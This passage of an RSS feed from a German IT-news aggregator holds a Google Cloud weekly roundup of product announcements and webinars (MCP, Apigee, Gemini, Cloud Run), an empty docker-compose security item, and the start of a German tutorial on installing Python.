<li><strong>API-to-Agent Security: Exposing REST APIs to Gemini Enterprise via MCP<br></strong>Connect Gemini Enterprise agents to core data without creating security hazards. Join Google Cloud Specialist Nigel Walters on June 11 to learn how to instantly transform legacy REST APIs into secure Model Context Protocol (MCP) servers. We’ll cover how to safely register tools with Gemini while enforcing gateway-level guardrails like rate limiting and access control policies.<br><br><a href="https://goo.gle/4nVyjIr" rel="noopener" target="_blank"><strong>Register for the June 11 Community TechTalk</strong></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>May 18 - May 22</h3>
<ul>
<li><strong>Chinese Webinar | June 4: AI Command and Control<br></strong>As AI agents move from experimental pilots to core enterprise functions, governance has become a critical next step. Join Google Cloud on June 4th at 10:00 AM (Beijing Time) to learn how to build a secure AI management layer architecture. We'll explore how to develop governed MCP (Model Context Protocol) endpoints, manage tool access to enterprise data, and leverage robust audit logs to operationalize AI. This session also includes a practical demonstration of these governance frameworks on Google Cloud.<br><br><a href="https://goo.gle/4dx4Lf5" rel="noopener" target="_blank">Register here</a></li>
<li><strong>GCP Announces New Features to Benchmark and Optimize LLMs for On-Device Use Cases<br></strong>Deploying fine-tuned LLMs from GCP to edge devices like smartphones is complex due to fragmented hardware. Google AI Edge Portal bridges this gap, giving GCP developers the ability to test AI performance on 120+ Android devices, representing the full diversity of high, medium, and low tier smartphones on the market today. This week at I/O, we announced brand new <a href="https://cloud.google.com/blog/products/ai-machine-learning/benchmark-llms-on-device-with-ai-edge-portal" rel="noopener" target="_blank">capabilities</a> to benchmark and debug LLM performance across these devices. <a href="https://docs.google.com/forms/d/e/1FAIpQLSfTcGPycQve8TLAsfH46pBlXBZe9FrgJAClwbF7DeL1LgVn4Q/viewform" rel="noopener" target="_blank">Sign-up</a> to utilize these new features in private preview today.</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>May 11 - May 15</h3>
<ul>
<li><strong>Build Your AI &amp; MCP Control Tower for Universal Governance<br></strong>Master the future of agentic security with Apigee. Join our Community TechTalk on May 21 to discover how Apigee serves as a central "Control Tower" for the Model Context Protocol (MCP). We will explore how new JSON-RPC tool authorization enables fine-grained access policies across your organization, ensuring secure and scalable AI deployments. Whether managing internal tools or external users, learn to govern your agentic ecosystem with absolute precision. This session is designed for global coverage across EMEA and AMER regions.<br><br><a href="https://goo.gle/4u9slWF" rel="noopener" target="_blank">Register for the May 21 Community TechTalk</a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Apr 27 - May 1</h3>
<ul>
<li><strong>Master Your Launch: The Apigee Production Go-Live Checklist<br></strong>Ensure a secure launch with the Apigee production guide. Join Nicola Cardace on May 28 to explore security guardrails, including IAM roles, mTLS configurations, and encrypted KVM migrations. Scheduled at 11 AM EDT / 5 PM CEST to support EMEA and AMER teams, this TechTalk provides the technical roadmap you need to flip the switch with absolute confidence.<br><br><strong><a href="https://goo.gle/4elMCTI" rel="noopener" target="_blank">Register for the May 28 Community TechTalk</a></strong></li>
<li>
<p><strong>Transforming APIs into Governed Agentic Tools on the Google Cloud Agentic Platform<br></strong><span>Turn your APIs into secure, governed agentic tools on the Google Cloud Agentic Platform. Join Specialist Christophe Lalevée on May 7 for a technical deep dive into AI productization. Scheduled at 5 PM CEST / 11 AM EDT to maximize coverage for developers across EMEA and AMER, this session explores the integration and governance frameworks required to scale enterprise-ready AI with confidence.</span></p>
<p><a href="https://goo.gle/3PfWm7M" rel="noopener" target="_blank">Register for the May 7 Community TechTalk</a></p>
</li>
<li><a href="https://docs.cloud.google.com/compute/docs/accelerator-optimized-machines#g4-machine-types" rel="noopener" target="_blank">Fractional G4 VMs</a> are Generaly Available, providing a highly efficient and cost-effective entry point for AI and graphics workloads. These new configurations, using NVIDIA virtual GPU (vGPU) technology, allow you to leverage the power of the NVIDIA RTX PRO 6000 Blackwell Server Edition GPUs in flexible, smaller increments, so you can right-size your infrastructure to match the specific demands of your applications. By providing more granular access to advanced hardware, fractional G4 VMs let you optimize resource allocation and reduce overhead without sacrificing performance. You can now select from additional GPU slice sizes for your specific needs:
<ul>
<li><strong>1/2 GPU:</strong> Ideal for more intensive tasks such as LLM inference, robotics sensor simulation, and high-fidelity 3D rendering.</li>
<li><strong>1/4 GPU:</strong> Optimized for mainstream workloads, including mid-range creative design, video transcoding, and real-time data visualization.</li>
<li><strong>1/8 GPU:</strong> Great for lightweight applications such as remote desktops, productivity tools, and entry-level streaming services.</li>
</ul>
</li>
<li>
<p>Transitioning AI from a sandbox prototype to an enterprise-grade system is a major hurdle. A monolithic script won't suffice for widespread deployment. To achieve true scale and reliability with Gemini, organizations must adopt service-oriented micro-agent architectures, establish Zero-Trust security, and implement rigorous EvalOps. Master the "Agentic Maturity Ladder" to ensure your AI &amp; Agentic solutions are robust, secure, and ready for the real world.</p>
<p><a href="https://lnkd.in/gHBH8cTv" rel="noopener" target="_blank">Watch the deep dive</a> and <a href="https://discuss.google.dev/t/beyond-the-prototype-scaling-production-grade-agents-with-gemini/356140" rel="noopener" target="_blank">read the developer blog</a> to learn more.</p>
</li>
<li><strong>ML Development in VS Code with Google Cloud Power: Workbench Extension Now Available<br></strong>Data scientists and developers can now combine the local productivity of VS Code with the scalable infrastructure of Google Cloud. The new Google Cloud Workbench Notebooks extension allows you to connect to and run notebooks on managed cloud environments directly within your local IDE. This integration streamlines the ML lifecycle by eliminating context switching and providing high-performance compute for complex workloads in a familiar interface. As part of our commitment to the developer ecosystem, the extension is fully open-sourced to support community-driven innovation.
<ul>
<li><strong>Install from Marketplace:</strong> <a href="https://marketplace.visualstudio.com/items?itemName=GoogleCloudTools.workbench-notebooks" rel="noopener" target="_blank">GoogleCloudTools.workbench-notebooks</a></li>
<li><strong>Contribute on GitHub:</strong> <a href="https://github.com/GoogleCloudPlatform/colab-enterprise-vscode" rel="noopener" target="_blank">colab-enterprise-vscode</a></li>
</ul>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Apr 20 - Apr 24</h3>
<ul>
<li><strong>Announcing the 2026 Google Cloud Partners of the Year<br></strong>Google Cloud is honored to celebrate the winners of the 2026 Partner of the Year awards! These awards recognize an exceptional group of partners across AI, Security, Infrastructure, and more, who have demonstrated a commitment to customer success. From global system integrators to specialized startups, these winners are leveraging the power of Google Cloud to solve complex challenges and drive digital transformation worldwide. Join us in congratulating these organizations for their innovation, collaboration, and impactful results over the past year.<br><br>See the <a href="https://cloud.google.com/blog/topics/partners/2026-partners-of-the-year-winners-next26">2026 Partner Award winners</a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Apr 13 - Apr 17</h3>
<ul>
<li>We're excited to announce the <strong>Public Preview of Datastream’s metadata integration with Knowledge Catalog</strong>. This is the first step in our vision to provide a centralized, "single pane of glass" for all Datastream assets. The enhancement automatically synchronizes Streams, Connection Profiles, and Private Connections, eliminating data silos. It enhances discoverability, allowing you to search for Datastream assets using the same interface as BigQuery tables. Centralized governance is also provided, making your real-time data estate more transparent and easier to manage.</li>
<li><strong>Upgrading Apigee OPDK to 4.53 with OS Modernization<br></strong>Modernize your infrastructure using Google’s official, sequential upgrade path. Our Technical expert, Rakesh Talanki outlines how to upgrade Apigee OPDK to v4.53 while migrating to a supported OS (RHEL 8.x/9.x). This guide covers the "build-out" methodology, including multi-data center syncing, to ensure a stable, zero-downtime transition<br><br><a href="https://goo.gle/3Oa8uqy" rel="noopener" target="_blank">Read the guide</a></li>
<li><strong>Cloud Run Worker Pools and CREMA: Powering Serverless AI at Scale<br></strong>Google Cloud has announced the General Availability of <strong>Cloud Run worker pools</strong>, a new resource type designed specifically for pull-based, non-HTTP workloads. Unlike traditional Cloud Run services that scale based on request traffic, worker pools provide an "always-on" environment for background tasks like processing message queues or running large-scale AI inference. To support this, Google Cloud also open-sourced the <strong>Cloud Run External Metrics Autoscaler (CREMA)</strong>. Built on KEDA, CREMA enables queue-aware autoscaling for worker pools, allowing them to dynamically scale based on external signals like Pub/Sub backlog or Kafka lag.</li>
<li><strong>Apigee Model Context Protocol (MCP) now Generally Available<br></strong>Expose enterprise APIs as MCP tools for agentic AI applications with the General Availability of MCP in Apigee. This update allows developers to transform APIs into AI-ready tools using OpenAPI Specifications, removing the need for local MCP servers or additional infrastructure. With managed endpoints and semantic search in API hub, you can now provide AI agents with secure, governed access to enterprise data at scale.<br><br><a href="https://goo.gle/3QfoEQ4" rel="noopener" target="_blank"><em>Explore the MCP overview</em></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Apr 6 - Apr 10</h3>
<ul>
<li><strong>Community TechTalk: Powering Retail Agents with ADK, UCP &amp; Apigee X<br></strong>Move beyond basic chatbots to secure, transactional AI experiences. Join our Community TechTalk on April 16 to learn how Apigee X and Gemini build a "Trust Layer" for AI shopping assistants using UCP standards. We’ll demonstrate how to block prompt injections with Model Armor and implement cost governance via token limits to secure the path from discovery to purchase.<br><br><a href="https://goo.gle/41ocUgq" rel="noopener" target="_blank"><span>Register for the TechTalk</span></a></li>
<li><strong>Implement multimodal capabilities in your AI agents<br></strong>Explore three new reference architectures for building sophisticated multi-agent AI systems that can process and analyze multimodal data. To analyze disparate multimodal data and produce a high-confidence classification, see <a href="https://docs.cloud.google.com/architecture/agentic-ai-classify-multimodal-data"><span>Classify multimodal data</span></a><span>. To create a fluid conversational AI that processes audio and video streams in real time, see</span> <a href="https://docs.cloud.google.com/architecture/agentic-ai-bidirectional-multimodal-streaming"><span>Enable live bidirectional multimodal streaming</span></a><span>. To consolidate fragmented multimodal data into a searchable knowledge graph, see</span> <a href="https://docs.cloud.google.com/architecture/agentic-ai-multimodal-graph-rag-resource-orchestration"><span>Multimodal GraphRAG resource orchestration</span></a><span>.</span></li>
<li><strong>Automate SecOps workflows with an agentic AI system<br></strong>To accelerate incident response and reduce manual toil for your security team, you need a system that can automate remediation playbooks. Our new reference architecture helps you build an AI agent that orchestrates complex triage and investigation workflows across disparate security tools, such as SIEM, CSPM, and EDR, from a single interface. See the full guide to <a href="https://docs.cloud.google.com/architecture/agentic-ai-orchestrate-security-ops-workflows"><span>orchestrate security operations workflows</span></a><span>.</span></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 30 - Apr 3</h3>
<ul>
<li><strong>ASEAN Webinar | April 30: Mastering Agentic Governance at Scale with GCP<br></strong>As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud experts <strong>Shilpi Puri &amp; Wely Lau</strong> for a <strong>webinar</strong> on <strong>April 30th at 11:00 AM SGT</strong> to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.<br><br><a href="https://goo.gle/47FX1Wn" rel="noopener" target="_blank"><strong>RSVP here.</strong></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 23 - Mar 27</h3>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Turn your API sprawl into an agent-ready catalog<br></strong><span>As organizations scale, APIs often become scattered across multiple gateways, creating "blind spots" that hinder AI adoption. To solve this, we’ve introduced two new capabilities for Apigee API hub: a new integration with API Gateway to automatically centralize API metadata into a single control plane, and a specification boost add-on (now in public preview). This add-on uses AI to enhance your API documentation with the precise examples and error codes that AI agents need to function reliably.<br><br></span><a href="https://goo.gle/47dEYqc" rel="noopener" target="_blank"><span>Read the full blog post to get started.</span></a></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Webinar | April 16: AI Command &amp; Control<br></strong><span>As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud expert Satyam Maloo for a webinar on April 16th at 11:00 AM IST to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.<br><br></span><a href="https://goo.gle/4t43Vg4" rel="noopener" target="_blank"><span>RSVP here.</span></a></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Modernizing and Decoupling Event Ingestion with Apigee<br></strong><span>In modern cloud-native architectures, decoupling producers from consumers is critical for building resilient systems. While Google Cloud Pub/Sub provides a scalable backbone, exposing it directly to external clients can introduce security and management overhead. This new guide explores how to leverage Apigee as an intelligent HTTP ingestion point. Learn how to handle security, mediation, and traffic control before messages reach your internal bus using the PublishMessage policy or Pub/Sub API.</span><br><br><a href="https://goo.gle/3POgsWF" rel="noopener" target="_blank"><span>Read the full guide.</span></a></p>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 16 - Mar 20</h3>
<ul>
<li><strong>Gemini-powered Assistant in BigQuery Studio Gets Context-Aware Upgrades<br></strong>The Gemini-powered assistant in BigQuery Studio has been transformed into a fully context-aware analytics partner, supporting your entire data lifecycle. The new capabilities include intelligent resource discovery, which uses Dataplex Universal Catalog search to find resources across projects and deep dive into metadata using natural language. You can now automate tasks, such as scheduling production-grade queries directly through the chat interface, and instantly troubleshoot long-running or failed jobs with root cause analysis and cost control auditing.<br><br><a href="https://docs.cloud.google.com/bigquery/docs/use-cloud-assist">Explore</a> the full range of what the assistant can do.</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 9 - Mar 13</h3>
<ul>
<li>
<div><strong>Want to use Gemini to develop code and don't know where to start?</strong><br>This <a href="https://medium.com/google-cloud/supercharge-your-spark-development-with-gemini-1540f1cb47d4" rel="noopener" target="_blank">article</a> includes a couple of examples of developing code with Gemini prompts; it identified changes that were needed to be made to get the code working. The article also refers to other examples that are available on github. </div>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Mar 2 - Mar 6</h3>
<ul>
<li>
<p><span><strong>Introducing Gemini 3.1 Flash-Lite, our fastest and most cost-efficient Gemini 3 series model.</strong> Built for high-volume developer workloads at scale, 3.1 Flash-Lite delivers high quality for its price and model tier. Gemini 3.1 Flash-Lite can tackle tasks at scale, like high-volume translation and content moderation, where cost is a priority. And it can also handle more complex workloads where more in-depth reasoning is needed, like generating user interfaces and dashboards, creating simulations or following instructions.</span></p>
<p><span>Starting today, 3.1 Flash-Lite is rolling out in preview to enterprises via </span><a href="https://console.cloud.google.com/vertex-ai/studio/multimodal?mode=prompt&amp;model=gemini-3.1-flash-lite-preview"><span>Vertex AI</span></a><span> and </span><span>developers via the Gemini API in </span><a href="https://aistudio.google.com/prompts/new_chat?model=gemini-3.1-flash-lite-preview" rel="noopener" target="_blank"><span>Google AI Studio</span></a><span>.</span></p>
</li>
<li>
<div>
<p><strong>TechTalk: Implementing Device Authorization Grant (RFC 8628) for Apigee</strong><br>Learn how to authorize "headless" devices like Smart TVs or AI agents that lack keyboards and browsers. Join our Community TechTalk on March 19 (5PM CET / 12PM EDT) to go under the hood of Apigee X/Hybrid. We’ll cover the real-world mechanics of state management, polling, and human-in-the-loop security patterns for devices and autonomous agents.</p>
<p><a href="https://goo.gle/4r6o6Zi" rel="noopener" target="_blank">Register for the TechTalk</a></p>
</div>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Feb 23 - Feb 27</h3>
<ul>
<li>
<p><span><strong>Pro-level image generation gets faster and more accessible with Nano Banana 2<br></strong></span><span>Nano Banana 2 is our state-of-the-art image generation and editing model. It delivers Pro-level image generation and editing at the speed you expect from Flash — making the quality, reasoning, and world knowledge you loved about Nano Banana Pro more accessible. Learn more about the model </span><a href="https://blog.google/innovation-and-ai/technology/ai/nano-banana-2" rel="noopener" target="_blank"><span>here</span></a><span>.</span></p>
</li>
</ul>
<ul>
<li>
<p><strong>The Intelligent Path to Compliance: Transforming Regulatory QC with Google Cloud<br></strong><span>Reducing "Refuse to File" (RTF) risks and submission cycle times is critical for life sciences leaders. Google Cloud’s Regulatory Submission Semantic QC Auditor leverages Gemini and RAG architecture to transform Quality Control from a manual burden into an active, intelligent workflow.</span></p>
<p><span>By automating semantic cross-referencing, narrative coherence checks, and dynamic guidance-based auditing, this solution ensures rigorous accuracy and auditability. Operating within a secure GxP-ready environment, it empowers teams to detect subtle inconsistencies and generate remediation plans without sacrificing data privacy. <br><br></span><a href="https://discuss.google.dev/t/the-intelligent-path-to-compliance-transforming-regulatory-quality-control-with-google-cloud/335276" rel="noopener" target="_blank"><span>Learn more</span></a><span>.</span></p>
</li>
<li><span><span>Stop typing, start interacting! <strong>The Gemini Live Agent Challenge is here</strong>. Build immersive agents that can help you see, hear, and speak using Gemini and Google Cloud. Compete for your share of $80,000+ in prizes and a trip to Google Cloud Next '26!<br><br></span><span>Submissions are open from February 16, 2026 to March 16, 2026. Learn more and register at </span><a href="http://geminiliveagentchallenge.devpost.com/" rel="noopener" target="_blank"><span>geminiliveagentchallenge.devpost.com</span></a></span></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Feb 9 - Feb 13</h3>
<ul>
<li>
<p><strong><span>Introducing Gemini 3.1 Pro on Google Cloud. </span></strong></p>
<span>3.1 Pro is a noticeably smarter, more capable baseline for complex problem-solving. We’re shipping 3.1 Pro at scale, building upon our </span><a href="https://cloud.google.com/blog/products/ai-machine-learning/gemini-3-is-available-for-enterprise?e=48754805"><span>goal</span></a><span> to help you transform your business for the agentic future. Learn more about the model’s capabilities </span><a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-1-pro" rel="noopener" target="_blank"><span>here</span></a><span>. Gemini 3.1 Pro is available starting today in preview in </span><a href="https://cloud.google.com/vertex-ai?e=48754805"><span>Vertex AI</span></a><span> and </span><a href="https://cloud.google.com/gemini-enterprise?e=48754805"><span>Gemini Enterprise</span></a><span>. Developers can access the model in preview via the Gemini API in </span><a href="https://aistudio.google.com/prompts/new_chat?model=gemini-3.1-pro-preview" rel="noopener" target="_blank"><span>Google AI Studio</span></a><span>, </span><a href="https://developer.android.com/studio" rel="noopener" target="_blank"><span>Android Studio</span></a><span>, </span><a href="https://antigravity.google/blog/gemini-3-1-in-google-antigravity" rel="noopener" target="_blank"><span>Google Antigravity</span></a><span>, and </span><a href="https://geminicli.com/" rel="noopener" target="_blank"><span>Gemini CLI</span></a><span>.<br><br></span></li>
<li><strong>Automate Storage Compatibility with GKE Dynamic Default Storage Classes<br></strong>Managing storage across mixed-generation VM clusters in GKE just got easier. With the new <strong>Dynamic Default Storage Class</strong>, Google Kubernetes Engine automatically selects between Persistent Disk (PD) and Hyperdisk based on a node's specific hardware compatibility. This abstraction eliminates the need for complex scheduling rules and manual pairing, ensuring your volumes "just work" regardless of the underlying infrastructure. By defining both variants in a single class, you reduce operational overhead while maintaining peak performance and cost-efficiency across your entire cluster.<br><br><a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/hyperdisk#automated_disk_type_selection" rel="noopener" target="_blank">Explore automated disk type selection</a></li>
<li>
<p><strong>Community TechTalk: AI-Powered Apigee Development with strofa.io<br></strong><strong>Join the Apigee community on February 26</strong><span> for a deep dive into</span> <a href="https://www.google.com/search?q=http://strofa.io" rel="noopener" target="_blank"><span>strofa.io</span></a><span>. Guest speaker Denis Kalitviansky will demonstrate how this new AI-powered tool automates and orchestrates Apigee development, from local emulators to large-scale hybrid environments. Discover how to scale your API management and streamline team collaboration using the latest in AI-driven automation.</span></p>
<p><a href="https://goo.gle/3Oerns3" rel="noopener" target="_blank"><span>Register now to reserve your spot.</span></a></p>
</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jan 26 - Jan 30</h3>
<ul>
<li><strong><span>Simplify API Governance with Native OpenAPI v3 Support<br></span></strong>Eliminate integration debt and accelerate deployment velocity with the General Availability of OpenAPI v3 (OASv3) support for API Gateway and Cloud Endpoints. You no longer need to downgrade modern specifications to OASv2. Instead, you can now define API contracts and enforce critical policies—including telemetry, quotas, and security—using native Google-specific extensions directly within your OASv3 files. This update ensures your APIs are secure by design while remaining fully compatible with the modern developer ecosystem and Google Cloud’s AI services.<br><br><a href="https://goo.gle/49Wx58Z" rel="noopener" target="_blank"><span>Get started with OpenAPI v3 on API Gateway and Cloud Endpoints.</span></a></li>
</ul>
<ul>
<li><strong><span>Accelerate API Testing with the New Open Source API Tester<br></span></strong>Start validating your APIs with API Tester, a simple, YAML-based Test Driven Development (TDD) framework. Designed for the Apigee community, this tool allows you to write human-readable tests, run them instantly via a web client or CLI, and perform deep unit testing on Apigee proxies. With native support for JSONPath assertions and Apigee shared flows, you can verify everything from payload data to internal variables like <code>proxy.basepath</code><span> without leaving your terminal.<br><br></span><a href="https://goo.gle/4q5WDGK" rel="noopener" target="_blank"><span>Explore the API Tester guide and start testing your proxies today.</span></a></li>
<li><strong><span>Secure Sensitive Data with Kubernetes Secrets in Apigee hybrid<br></span></strong>Enhance security in Apigee hybrid by accessing Kubernetes Secrets directly within your API proxies. This hybrid-exclusive feature keeps sensitive credentials within your cluster boundary and prevents replication to the management plane. It supports strict separation of duties: operators manage secrets via <code>kubectl</code><span>, while developers reference them as secure flow variables—ideal for high-compliance and GitOps workflows.<br><br></span><a href="https://goo.gle/4qEVffo" rel="noopener" target="_blank"><span>Implement Kubernetes Secrets in your hybrid proxies.</span></a></li>
<li><strong><span>See the Console in a Whole New Light: Dark Mode is Now Generally Available in Google Cloud<br></span></strong>Elevate your cloud management workflow with Dark Mode, now generally available in the Google Cloud console. We have delivered a modern, cohesive, and accessible experience reimagined for maximum comfort and productivity—especially during extended working hours and low-light environments. Dark Mode can be enabled automatically based on your operating system's preference, or manually through the Settings  -&gt; Appearance menu.<br><br><a href="https://docs.cloud.google.com/docs/get-started/console-appearance"><span>Switch to Dark Mode today to enjoy a modern, comfortable, and productive environment!</span></a></li>
<li><strong><span>Apigee X Networking: PSC or VPC Peering?<br></span></strong>Deciding how to connect Apigee X? Watch this video to compare Private Service Connect and VPC Peering. We break down northbound and southbound routing, IP consumption, and how to reach targets on-prem or in the cloud. Learn to simplify your architecture and avoid common networking "gotchas" for a smoother deployment.<br><br><a href="https://goo.gle/4bWBGdV" rel="noopener" target="_blank"><span>Watch the video.</span></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jan 19 - Jan 23</h3>
<ul>
<li><strong>Bridge the Gap: Excel-to-API Conversion in Apigee Portals<br></strong><span>Give your customers more ways to connect! This new article by Tyler Ayers explores how to extend the Apigee Integrated Portal to support direct Excel file uploads. By leveraging SheetJS and custom portal scripts, you can enable users to upload spreadsheets, preview data, and submit it directly to your APIs, all without writing a single line of integration code themselves. It’s a powerful way to simplify onboarding for those who aren't yet API-ready.<br><br></span><a href="https://goo.gle/3Nq3Pjo" rel="noopener" target="_blank"><span>Learn how to build it</span></a><span>.</span></li>
<li><strong>Elevate your applications with Firestore’s new advanced query engine<br></strong><span>We have fundamentally reimagined Firestore with pipeline operations for Enterprise edition. Experience a powerful new engine featuring over a hundred new query features, index-less queries, new index types, and observability tooling to improve query performance. Seamlessly migrate using built-in tools and leverage Firestore’s existing differentiated serverless foundation, virtually unlimited scale, and industry-leading SLA. Join a community of 600K developers to craft expressive applications that maximize the benefits of rich queryability, real-time listen queries, robust offline caching, and cutting-edge AI-assistive coding integrations.<br><br></span><a href="https://cloud.google.com/blog/products/data-analytics/new-firestore-query-engine-enables-pipelines?e=48754805"><span>Learn more about Firestore pipeline operations.</span></a></li>
</ul></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Zwei Probleme in docker-compose (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3662804/unix-server/security-zwei-probleme-in-docker-compose-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662804/unix-server/security-zwei-probleme-in-docker-compose-fedora/</guid>
<pubDate>Sun, 12 Jul 2026 07:46:31 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Tutorial: Python richtig installieren]]></title>
<description><![CDATA[Python gilt als Shooting Star unter den Programmiersprachen. Wir sagen Ihnen, wie Sie die Installation unter Windows, Linux und MacOS reibungslos bewerkstelligen und was Sie dabei beachten sollten.
					Foto: Flegere – shutterstock.com




Mit der einsteiger- und benutzerfreundlichen Programmiers...]]></description>
<link>https://tsecurity.de/de/3662673/it-security-nachrichten/tutorial-python-richtig-installieren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662673/it-security-nachrichten/tutorial-python-richtig-installieren/</guid>
<pubDate>Sun, 12 Jul 2026 05:09:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Python gilt als Shooting Star unter den Programmiersprachen. Wir sagen Ihnen, wie Sie die Installation unter Windows, Linux und MacOS reibungslos bewerkstelligen und was Sie dabei beachten sollten." title="Python gilt als Shooting Star unter den Programmiersprachen. Wir sagen Ihnen, wie Sie die Installation unter Windows, Linux und MacOS reibungslos bewerkstelligen und was Sie dabei beachten sollten." src="https://images.computerwoche.de/bdb/3284280/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Python gilt als Shooting Star unter den Programmiersprachen. Wir sagen Ihnen, wie Sie die Installation unter Windows, Linux und MacOS reibungslos bewerkstelligen und was Sie dabei beachten sollten.</p></figcaption></figure><p class="imageCredit">
					Foto: Flegere – shutterstock.com</p></div>




<p>Mit der einsteiger- und benutzerfreundlichen Programmiersprache <a title="Python" href="https://www.computerwoche.de/article/2815440/die-zukunft-der-python-webentwicklung.html" target="_blank">Python</a> können Sie nahezu jede erdenkliche <a title="Applikation coden" href="https://www.computerwoche.de/article/2805928/die-besten-profiler.html" target="_blank">Applikation coden</a>. Aber es ist eben auch nur eine Software wie jede andere – Installation und Management können mitunter komplex ausfallen. Wir verraten Ihnen, wie Sie <a title="Python" href="https://www.computerwoche.de/article/2762025/python-lernen-leicht-gemacht.html" target="_blank">Python</a> aufsetzen, die richtige Version für Ihre Zwecke ermitteln und mögliche Fallstricke bei der Installation unter <a class="idgGlossaryLink" href="https://www.computerwoche.de/k/windows-10,3530" target="_blank">Windows</a>, <a class="idgGlossaryLink" href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank">Linux</a> und MacOS vermeiden.</p>



<h2 class="wp-block-heading">Die richtige Python-Version ermitteln</h2>



<p>Um die Kompatibilität mit Drittanbieter-Modulen gewährleisten zu können, sollten Sie nicht auf die neueste Python-Version setzen. Stattdessen empfiehlt sich die letzte große Versionierung. Aktuell (Stand: Juni 2026) ist Python 3.14.6 die neueste Version. Um sicherzugehen, dass alles läuft, sollten Sie sich also für die letzte Revision von Python 3.13 entscheiden. Natürlich können Sie die neueste Python-Version jederzeit in einer geschützten Umgebung – etwa einer <a title="virtuellen Maschine" href="https://www.computerwoche.de/article/2814705/was-sind-virtual-machines.html" target="_blank">virtuellen Maschine</a> – austesten.</p>



